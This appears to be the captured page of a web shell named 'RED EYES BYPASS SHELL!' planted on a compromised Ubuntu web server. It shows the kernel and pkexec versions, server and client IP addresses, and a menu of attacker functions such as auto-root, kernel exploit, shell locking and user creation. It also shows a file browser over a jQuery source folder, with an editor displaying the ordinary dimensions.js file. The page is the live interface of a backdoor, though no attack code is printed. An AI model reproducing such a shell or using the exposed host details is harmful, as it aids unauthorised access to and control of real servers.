Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
plugin /
jquery /
src /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
ajax
[ DIR ]
drwxr-xr-x
attributes
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
deferred
[ DIR ]
drwxr-xr-x
deprecated
[ DIR ]
drwxr-xr-x
effects
[ DIR ]
drwxr-xr-x
event
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
manipulation
[ DIR ]
drwxr-xr-x
queue
[ DIR ]
drwxr-xr-x
traversing
[ DIR ]
drwxr-xr-x
var
[ DIR ]
drwxr-xr-x
ajax.js
22.35
KB
-rwxr-xr-x
attributes.js
217
B
-rwxr-xr-x
callbacks.js
5.42
KB
-rwxr-xr-x
core.js
8.97
KB
-rwxr-xr-x
css.js
13.83
KB
-rwxr-xr-x
data.js
4.22
KB
-rwxr-xr-x
deferred.js
10.75
KB
-rwxr-xr-x
deprecated.js
2.17
KB
-rwxr-xr-x
dimensions.js
1.71
KB
-rwxr-xr-x
effects.js
17
KB
-rwxr-xr-x
event.js
23.85
KB
-rwxr-xr-x
jquery.js
646
B
-rwxr-xr-x
manipulation.js
12.03
KB
-rwxr-xr-x
offset.js
6.67
KB
-rwxr-xr-x
queue.js
3.02
KB
-rwxr-xr-x
selector-native.js
6.31
KB
-rwxr-xr-x
selector-sizzle.js
411
B
-rwxr-xr-x
selector.js
66
B
-rwxr-xr-x
serialize.js
3.16
KB
-rwxr-xr-x
traversing.js
4.58
KB
-rwxr-xr-x
wrap.js
1.44
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dimensions.js
define( [ "./core", "./core/access", "./var/isWindow", "./css" ], function( jQuery, access, isWindow ) { "use strict"; // Create innerHeight, innerWidth, height, width, outerHeight and outerWidth methods jQuery.each( { Height: "height", Width: "width" }, function( name, type ) { jQuery.each( { padding: "inner" + name, content: type, "": "outer" + name }, function( defaultExtra, funcName ) { // Margin is only for outerHeight, outerWidth jQuery.fn[ funcName ] = function( margin, value ) { var chainable = arguments.length && ( defaultExtra || typeof margin !== "boolean" ), extra = defaultExtra || ( margin === true || value === true ? "margin" : "border" ); return access( this, function( elem, type, value ) { var doc; if ( isWindow( elem ) ) { // $( window ).outerWidth/Height return w/h including scrollbars (gh-1729) return funcName.indexOf( "outer" ) === 0 ? elem[ "inner" + name ] : elem.document.documentElement[ "client" + name ]; } // Get document width or height if ( elem.nodeType === 9 ) { doc = elem.documentElement; // Either scroll[Width/Height] or offset[Width/Height] or client[Width/Height], // whichever is greatest return Math.max( elem.body[ "scroll" + name ], doc[ "scroll" + name ], elem.body[ "offset" + name ], doc[ "offset" + name ], doc[ "client" + name ] ); } return value === undefined ? // Get width or height on the element, requesting but not forcing parseFloat jQuery.css( elem, type, extra ) : // Set width or height on the element jQuery.style( elem, type, value, extra ); }, type, chainable ? margin : undefined, chainable ); }; } ); } ); return jQuery; } );
Close